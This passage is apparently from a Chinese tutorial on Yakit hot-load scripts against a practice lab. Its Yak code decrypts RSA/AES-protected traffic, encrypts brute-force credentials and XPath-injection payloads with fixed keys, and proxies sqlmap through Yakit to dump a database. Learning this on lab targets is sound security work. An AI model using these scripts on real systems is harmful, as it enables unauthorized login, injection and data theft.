// 获取私钥以解密响应数据
pem = packet.privatekey
// 切割响应中的数据,作为 JSON 加载,body = json.loads(poc.GetHTTPPacketBody(rsp))
_, body = poc.Split(rsp)
body = json.loads(body)
//获取data、encryptedIV、encryptedKey密文
//data = body.data
//Key = body.encryptedKey
//IV = body.encryptedIV
//RSA解密key和iv
Key = codec.RSADecryptWithOAEP(pem /*type: []byte*/, codec.DecodeBase64(body.encryptedKey)~)~
IV = codec.RSADecryptWithOAEP(pem /*type: []byte*/, codec.DecodeBase64(body.encryptedIV)~)~
//AES解密data
data = codec.AESGCMDecryptWithNonceSize12(Key, codec.DecodeBase64(body.data)~, IV)~
return string(data)
}
爆破:
十二、SQL 注入(从登陆到 Dump 数据库)
AES-CBC加密
响应包解密:
请求包解密:
万能密码进入
搜索处sql注入
获取加密后的明文热加载(固定key、iv)
encryptData = func(p) {
//key+iv加密aes-cbc
key = codec.DecodeHex("30a4140dbd062ad0d49b13e94a855b88")~
iv = codec.DecodeHex("25c493424f449f469e18228a71b3f20c")~
//用户名、密码
username = ["admin"]
password = ["admin"]
//定义resultlist列表,将加密后的内容存放列表中
resultlist =[]
//for嵌套
for uname in username {
for passwd in password {
//定义加密内容格式
message = {"username":uname,"password":passwd}
//将message以json格式dumps下来
i = json.dumps(message)
//aes加密
result = codec.EncodeBase64(codec.AESCBCEncrypt(key /*type: []byte*/, i, iv /*type: []byte*/)~)
resultlist.Append(result)
}
}
return resultlist
}
//解密响应包内容
decryptData = func(packet) {
body = poc.GetHTTPPacketBody(packet /*type: []byte*/)
jsonbody = json.loads(body)
key = codec.DecodeHex(jsonbody.key)~
iv = codec.DecodeHex(jsonbody.iv)~
message = codec.DecodeBase64(jsonbody.message)~
message = codec.AESCBCDecrypt(key /*type: []byte*/, message, iv /*type: []byte*/)~
return poc.ReplaceBody(packet, message, false)
}
afterRequest = func(rsp){
return decryptData(rsp)
}
获取加前密后的明文热加载
//加密
encryptData = func(packet) {
body = poc.GetHTTPPacketBody(packet)
//随机数、或固定值都可以
//key = codec.DecodeHex("30a4140dbd062ad0d49b13e94a855b88")~
//iv = codec.DecodeHex("25c493424f449f469e18228a71b3f20c")~
key = randstr(16)
iv = randstr(12)
//加密message内容
result = codec.EncodeBase64(codec.AESCBCEncrypt(key, body, iv)~)
// 十六进制加密key、iv
//hexkey = ["30a4140dbd062ad0d49b13e94a855b88"]
//hexiv = ["25c493424f449f469e18228a71b3f20c"]
hexkey = codec.EncodeToHex(key)
hexiv = codec.EncodeToHex(iv)
// 输出body内容
body = f`{"key": "${hexkey}","iv": "${hexiv}","message": "${result}"}`
return poc.ReplaceBody(packet, body, false)
}
//解密响应包内容
decryptData = func(packet) {
body = poc.GetHTTPPacketBody(packet /*type: []byte*/)
//json格式转化对象传入jsonbody
jsonbody = json.loads(body)
//调用key、iv、message
key = codec.DecodeHex(jsonbody.key)~
iv = codec.DecodeHex(jsonbody.iv)~
//解密message内容
message = codec.AESCBCDecrypt(key /*type: []byte*/, codec.DecodeBase64(jsonbody.message)~, iv /*type: []byte*/)~
return poc.ReplaceBody(packet, message, false)
}
beforeRequest = func(req){
return encryptData(req)
}
afterRequest = func(rsp){
return decryptData(rsp)
}
注入:
联合查询
热加载爆破
encryptData = func(p) {
//key+iv加密aes-cbc
//或随机数key、iv循环
key = codec.DecodeHex("30a4140dbd062ad0d49b13e94a855b88")~
iv = codec.DecodeHex("25c493424f449f469e18228a71b3f20c")~
//用户名、密码
search = x"{{x(xpath-injection)}}"
//定义resultlist列表,将加密后的内容存放列表中
resultlist =[]
//for循环
for sea in search {
//定义加密内容格式
message = {"search":sea}
//将message以json格式dumps下来
i = json.dumps(message)
//aes加密
result = codec.EncodeBase64(codec.AESCBCEncrypt(key /*type: []byte*/, i, iv /*type: []byte*/)~)
resultlist.Append(result)
}
return resultlist
}
//解密响应包内容
decryptData = func(packet) {
body = poc.GetHTTPPacketBody(packet /*type: []byte*/)
jsonbody = json.loads(body)
key = codec.DecodeHex(jsonbody.key)~
iv = codec.DecodeHex(jsonbody.iv)~
message = codec.DecodeBase64(jsonbody.message)~
message = codec.AESCBCDecrypt(key /*type: []byte*/, message, iv /*type: []byte*/)~
return poc.ReplaceBody(packet, message, false)
}
afterRequest = func(rsp){
return decryptData(rsp)
}
sqlmap
将流量转发到yakit
–proxy=http://127.0.0.1:8081
将流量转发到yakit配合mitm热加载代码可实现响应明文输出
参考:
Yakit靶场-CVE柠檬
渗透测试高级技巧(二):对抗前端动态密钥与非对称加密防护
从前端验签与加解密学习Yakit中WebFuzzer热加载
